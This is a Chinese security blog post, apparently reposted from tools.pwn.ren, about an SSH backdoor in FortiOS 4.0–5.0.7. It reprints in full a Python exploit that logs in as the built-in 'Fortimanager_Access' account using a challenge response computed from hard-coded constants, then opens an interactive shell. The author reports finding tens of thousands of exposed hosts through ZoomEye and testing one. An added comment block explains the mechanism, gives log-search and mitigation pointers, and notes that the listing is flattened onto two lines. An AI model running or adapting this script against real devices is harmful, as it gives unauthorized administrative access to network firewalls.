飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7

所属分类:漏洞时代
from:tools.pwn.ren

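今天 4 点钟的时候,Twitter 上有老外放出一个针对飞塔(Fortinet)FortiOS 的 exp,称 4.0 – 5.0.7 版本存在一个 SSH 后门。
进行了简单的测试,影响确实重大!从下面的脚本看,所谓"后门"是固件内置账号 Fortimanager_Access 加上一个可由脚本中固定字符串计算出的应答,因此排查时可以在设备日志中检索该用户名的 SSH 登录记录。
通过 ZoomEye 搜索发现有 64567 台主机(这是搜索命中数,本文只挑选了一台测试,并未逐一验证),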
飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7
挑选一台进行测试
飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7
利用脚本
# NOTE(review): the listing below was flattened onto two physical lines by the
# page extraction (one statement is split across them), so it is not valid
# Python as shown. It is kept verbatim; only this comment block is added.
#
# What the listing shows:
#   * custom_handler() answers the SSH keyboard-interactive prompt. It takes
#     the first prompt string sent by the server, feeds it together with
#     constants embedded in the script into SHA-1, and returns the digest
#     base64-encoded behind the literal prefix 'AK1'.
#   * main() connects to the address in sys.argv[1], tries password auth with
#     an empty password for the account 'Fortimanager_Access' (ignoring an
#     AuthenticationException), then calls auth_interactive() for the same
#     account with custom_handler, and finally relays an interactive shell
#     between the SSH channel and the local terminal.
#
# Why it matters for defenders: every input to the response other than the
# server's own prompt is a fixed constant, so the response is not a
# per-device secret. In effect the account behaves like a hard-coded
# credential on the versions named in the header comment (4.x up to 5.0.7).
#
# Detection and mitigation pointers (to be confirmed against the vendor
# advisory, which is not quoted on this page):
#   * search device and SSH logs for authentication attempts or sessions
#     using the username 'Fortimanager_Access', especially from addresses
#     that are not the organisation's management platform;
#   * restrict SSH administrative access on the device to trusted
#     management addresses rather than exposing it to the internet;
#   * move to a firmware release outside the affected range stated above.
#!/usr/bin/env python  # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 # Usage: ./fgt_ssh_backdoor.py <target-ip>  import socket import select import sys import paramiko from paramiko.py3compat import u import base64 import hashlib import termios import tty  def custom_handler(title, instructions, prompt_list):     n = prompt_list[0][0]     m = hashlib.sha1()     m.update('/x00' * 12)     m.update(n + 'FGTAbc11*xy+Qqz27')     m.update('/xA3/x88/xBA/x2E/x42/x4C/xB0/x4A/x53/x79/x30/xC1/x31/x07/xCC/x3F/xA1/x32/x90/x29/xA9/x81/x5B/x70')     h = 'AK1' + base64.b64encode('/x00' * 12 + m.digest())     return [h]   def main():     if len(sys.argv) < 2:         print 'Usage: ' + sys.argv[0] + ' <target-ip>'         exit(-1)      client = paramiko.SSHClient()     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())      try:         client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)     except paramiko.ssh_exception.SSHException:         pass      trans = client.get_transport()     try:         trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)     except paramiko.ssh_exception.AuthenticationException:         pass      trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)     chan = client.invoke_shell()      oldtty = termios.tcgetattr(sys.stdin)     try:         tty.setraw(sys.stdin.fileno())         tty.setcbreak(sys.stdin.fileno())         chan.settimeout(0.0)          while True:             r, w, e = select.select([chan, sys.stdin], [], [])             if chan in r:                 try:                     x = u(chan.recv(1024))                     if len(x) == 0:                         sys.stdout.write('/r/n*** EOF/r/n')                         break                     sys.stdout.write(x)                     sys.stdout.flush()                 except socket.timeout:                     pass             if sys.stdin in r:                 x = 
sys.stdin.read(1)                 if len(x) == 0:                     break                 chan.send(x)      finally:         termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)   if __name__ == '__main__':     main()
